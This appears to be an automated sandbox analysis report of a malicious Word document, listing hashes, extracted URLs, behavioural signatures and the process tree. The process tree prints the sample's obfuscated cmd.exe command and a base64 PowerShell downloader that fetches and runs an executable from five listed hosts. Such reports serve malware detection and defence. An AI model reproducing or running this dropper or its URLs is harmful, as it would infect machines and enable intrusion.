Analysis
-
max time kernel
19s -
max time network
20s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 11:15
Static task
static1
Behavioral task
behavioral1
Sample
8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a.doc
Resource
win10v20201028
General
-
Target
8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a.doc
-
Size
78KB
-
MD5
77fa28e31ec25d1d8d1e639018d9b52f
-
SHA1
a7d364424df2b19000b76dadd0856fe107ed9f80
-
SHA256
8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a
-
SHA512
445574d75edc96c67fe10b4c0ee12c6867015793d7b1672577ace4ada0717715d5aa66fe4fe14e7c32a5c355baf065e4e62a829cf6ed767b0454f8c02f434f74
Malware Config
Extracted
http://artwellness.net/QD1Rti
http://arkanddove.com/t
http://ingridkaslik.com/M355AhF
http://softwarelibre.unipamplona.edu.co/limesurvey/upload/vJa
http://rmubp.chphmu.de/4bP6ssQ4
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3848 4760 Cmd.exe WINWORD.EXE -
Blacklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 29 1116 powershell.exe 31 1116 powershell.exe 33 1116 powershell.exe 35 1116 powershell.exe 37 1116 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 3848 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4760 WINWORD.EXE 4760 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1116 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4760 WINWORD.EXE 4760 WINWORD.EXE 4760 WINWORD.EXE 4760 WINWORD.EXE 4760 WINWORD.EXE 4760 WINWORD.EXE 4760 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 4760 wrote to memory of 3848 4760 WINWORD.EXE Cmd.exe PID 4760 wrote to memory of 3848 4760 WINWORD.EXE Cmd.exe PID 3848 wrote to memory of 1116 3848 Cmd.exe powershell.exe PID 3848 wrote to memory of 1116 3848 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd /V:^ON/C"^se^t ^13=A^AC^AgA^AIA^AC^A^gAA^IA^ACAg^A^A^I^A^ACAg^A^AI^A^AC^Ag^AAI^A^AC^A^gAQf^A0^HA7B^A^aAM^GA^0BQY^A^M^G^A9Bw^O^A^sG^AhBQZA^I^HA^i^B^wO^AQF^A^pB^gR^AQC^Ag^A^Q^b^AUG^A^0^BQ^S^A^0C^Al^BwaA8^G^A^2Bg^bAkEA7AQK^AQF^ApBgR^A^QC^A^g^AAL^Ao^G^A^PB^gQA^QCA^o^AQZA^w^G^A^p^B^gR^A^QGA^h^Bw^bA^w^GAuB^wdA8G^A^E^Bg^L^A^g^F^AuB^Q^W^A^QCA7^BQeA^IHA0^B^weA^kCA^3BQ^W^AIHA^kA^A^I^A4^G^A^pB^AI^Ao^G^APB^g^Q^AQC^Ao^AAaA^MG^Ah^BQ^ZAIH^AvBg^Z^A^s^DAnA^Q^ZAg^H^A^l^BgL^AcC^Ar^AAc^Ac^HA^MBA^JAsCAn^A^A^X^AcC^Ar^A^wY^AkGAsB^gY^AUHA^wB^gOAY^HAu^B^QZ^AQCA9^A^AVA^k^G^A^G^BAJA^s^D^AnAQ^OAcDAn^A^AI^A0^DA^g^AAc^Ac^H^A^M^B^AJA^sDA^p^Aw^J^A^AE^An^AA^KA^Q^HApBA^b^AA^HATB^g^LAcC^A^0^A^Q^U^A^MH^A^z^B^gN^AAFAi^BAN^A8CAl^B^A^Z^A4CA^1^BQ^b^Ag^G^A^w^B^A^a^AMG^A^uAAc^A^I^GA^1BQbAIH^Av^Aw^LA^o^DAw^BA^d^A^QHA^oBA^Q^AE^GAKB^g^d^A^8C^Ak^BQ^YA^8GA^sB^Ac^A^U^H^AvAQ^e^AU^GA^2B^gcA^U^H^A^z^BQ^ZA0GA^pB^AbA8C^Av^Bw^YA^4C^A^1^BAZA^UG^A^u^AQYA^4^G^Av^BAbAA^HA^tBQY^A^AH^Ap^B^g^bAUHAuAQZA^IH^A^i^B^Qa^A^w^GAl^B^gc^AEG^A^3B^A^d^A^Y^G^Av^BwcA^8C^Av^Ag^O^A^AH^A0^B^A^d^AgGAA^B^gR^Ag^G^AB^B^QNA^U^D^AzA^Q^TA8C^A^t^B^w^b^AM^GA^uAwaA^kG^A^s^B^wcAE^G^ArBAZA^k^G^Ay^B^w^Z^A4^GApB^w^LA8CA^6AAcAQH^A^0^BAa^A^AEA^0^B^wLA^0GAvB^w^YA4CA^lBg^d^A^8^GA^kB^AZA4^G^Ah^B^w^a^AIH^AhBwL^A^8C^A^6^A^Ac^AQ^H^A^0B^Aa^A^A^E^A^pB^A^d^A^IFAx^A^ARA^E^FAv^AA^dA^UG^Au^BgLAMHAz^BQ^Z^A4GAsB^AbAUG^A3^B^Ad^A^I^HAh^Bw^LA8CA6A^AcA^QHA0BAa^AcCA9A^wdA^k^FA^yB^A^J^As^D^A^0BgbAU^G^Ap^B^A^bAME^Ai^B^QZ^AcFAu^AA^dAUGAOB^AI^AQ^H^AjB^QZ^A^o^GAiBw^bA0C^A^3B^QZA^4^GA9AAW^A4GA^Z^BA^J^ ^e^- l^l^ehsr^e^w^o^p&&for /^L %^p ^in (1^021^;-^1^;0)^d^o s^e^t a^z^J=!a^z^J!!^13:~%^p,1!&&i^f %^p ^l^eq ^0 c^al^l %a^z^J:^~-^1^022%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABZAG4AWAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAFkAdwA9ACcAaAB0AHQAcAA6AC8ALwBhAHIAdAB3AGUAbABsAG4AZQBzAHMALgBuAGUAdAAvAFEARAAxAFIAdABpAEAAaAB0AHQAcAA6AC8ALwBhAHIAawBhAG4AZABkAG8AdgBlAC4AYwBvAG0ALwB0AEAAaAB0AHQAcAA6AC8ALwBpAG4AZwByAGkAZABrAGEAcwBsAGkAawAuAGMAbwBtAC8ATQAzADUANQBBAGgARgBAAGgAdAB0AHAAOgAvAC8AcwBvAGYAdAB3AGEAcgBlAGwAaQBiAHIAZQAuAHUAbgBpAHAAYQBtAHAAbABvAG4AYQAuAGUAZAB1AC4AYwBvAC8AbABpAG0AZQBzAHUAcgB2AGUAeQAvAHUAcABsAG8AYQBkAC8AdgBKAGEAQABoAHQAdABwADoALwAvAHIAbQB1AGIAcAAuAGMAaABwAGgAbQB1AC4AZABlAC8ANABiAFAANgBzAHMAUQA0ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABMAHcAcAAgAD0AIAAnADcAOQAnADsAJABGAGkAVAA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABMAHcAcAArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgBPAGoAIABpAG4AIAAkAHIAWQB3ACkAewB0AHIAeQB7ACQAWQBuAFgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQgBPAGoALAAgACQARgBpAFQAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQARgBpAFQAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1116-5-0x0000000000000000-mapping.dmp
-
memory/1116-6-0x00007FFAE1F50000-0x00007FFAE293C000-memory.dmpFilesize
9.9MB
-
memory/1116-7-0x0000014DE30D0000-0x0000014DE30D1000-memory.dmpFilesize
4KB
-
memory/1116-8-0x0000014DE3280000-0x0000014DE3281000-memory.dmpFilesize
4KB
-
memory/3848-4-0x0000000000000000-mapping.dmp
-
memory/4760-0-0x0000018CB1810000-0x0000018CB1E47000-memory.dmpFilesize
6.2MB
-
memory/4760-1-0x0000018CBA0C7000-0x0000018CBA0CC000-memory.dmpFilesize
20KB
-
memory/4760-2-0x0000018CBA0C7000-0x0000018CBA0CC000-memory.dmpFilesize
20KB